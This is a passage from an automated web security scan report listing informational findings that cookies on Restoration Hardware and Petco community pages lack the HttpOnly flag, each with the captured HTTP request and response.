P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www51
Content-Length: 0
Content-Type: text/plain


13.78. http://cimg-1.restorationhardware.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cimg-1.restorationhardware.com
Path:   /cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm?tid=6&ci=90007517&vn2=e3.1&st=1305510801743&vn1=4.3.5&ec=utf-8&pc=Y&pi=HOME%20PAGE&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.restorationhardware.com/&lp=expanding-banner%20email-signup HTTP/1.1
Host: cimg-1.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; CoreID6=30201305509985211832254; TestSess3=30201305509985211832254; 90007517_login=1305509992016783873090007517; 90007517_reset=1305509994; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; fsr.a=1305510801727

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:22 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90007517_reset=1305510802;path=/
Expires: Sun, 15 May 2011 07:53:22 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.79. http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /discussions/Bird_Discussion_Forum/fd03p00v06d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Bird_Discussion_Forum/fd03p00v06d1?widgetId=PTWidget17&cdsn=355&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:55:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB002 5/15/2011 9:55:00 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2407

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget17', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.80. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /discussions/Cat_Discussion_Forum/fd03p00v02d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Cat_Discussion_Forum/fd03p00v02d1?widgetId=PTWidget12&cdsn=541&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB030 5/15/2011 9:54:59 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:58 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2372

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget12', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.81. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /discussions/Dog_Discussion_Forum/fd03p00v01d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Dog_Discussion_Forum/fd03p00v01d1?widgetId=PTWidget11&cdsn=560&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB002 5/15/2011 9:54:58 PM, 259 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:57 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2593

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget11', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.82. http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /discussions/Ferret_Discussion_Forum/fd03p00v07d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Ferret_Discussion_Forum/fd03p00v07d1?widgetId=PTWidget15&cdsn=117&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:55:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:55:00 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2362

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget15', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.83. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /discussions/Fish_Discussion_Forum/fd03p00v03d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Fish_Discussion_Forum/fd03p00v03d1?widgetId=PTWidget13&cdsn=407&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:54:59 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:58 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2495

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget13', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.84. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /discussions/Reptile_Discussion_Forum/fd03p00v05d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Reptile_Discussion_Forum/fd03p00v05d1?widgetId=PTWidget16&cdsn=887&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:55:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB030 5/15/2011 9:55:00 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2532

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget16', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.85. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Small_Animal_Discussion_Forum/fd03p00v04d1?widgetId=PTWidget14&cdsn=528&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:55:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:55:00 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2525

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget14', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.86. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /discussions/Social_Applications_Polls/fd03p00v00apoll

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Social_Applications_Polls/fd03p00v00apoll?args=tid:LATEST;&widgetId=PTWidget10&cdsn=799&config=mspPolls0001&pttv=2&includeCSS=false&nav=mspPolls HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:54:59 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:58 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2844

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget10', "<div class=\"os-widgetpoll\">\r\n\t<div>\r\n\t\t<div class=\"os-widgetpoll\">\r\n\t\t\t<div id=\"PTWidget10_Poll
...[SNIP]...

13.87. http://community.petco.com/n/blogs/blog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /n/blogs/blog.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /n/blogs/blog.aspx?webtag=fd03p00v00b1&widgetId=PTWidget9&pttv=2&nav=widget&config=recentBlogPosts0001&includeCSS=false&cdsn=889 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:54:54 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:53 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2784

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget9', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentblogposts\">\r\n\t\t\t<div class=
...[SNIP]...

13.88. http://community.petco.com/n/pfx/forum.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /n/pfx/forum.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /n/pfx/forum.aspx?webtag=fd03p00v03d1&widgetId=PTWidget4&pttv=2&nav=widget&config=recentDiscussions0001&includeCSS=false&cdsn=873 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 301 Page has permanently moved
Connection: close
Date: Mon, 16 May 2011 01:54:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Location: /discussions/Fish_Discussion_Forum/fd03p00v03d1?widgetId=PTWidget4&cdsn=873&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
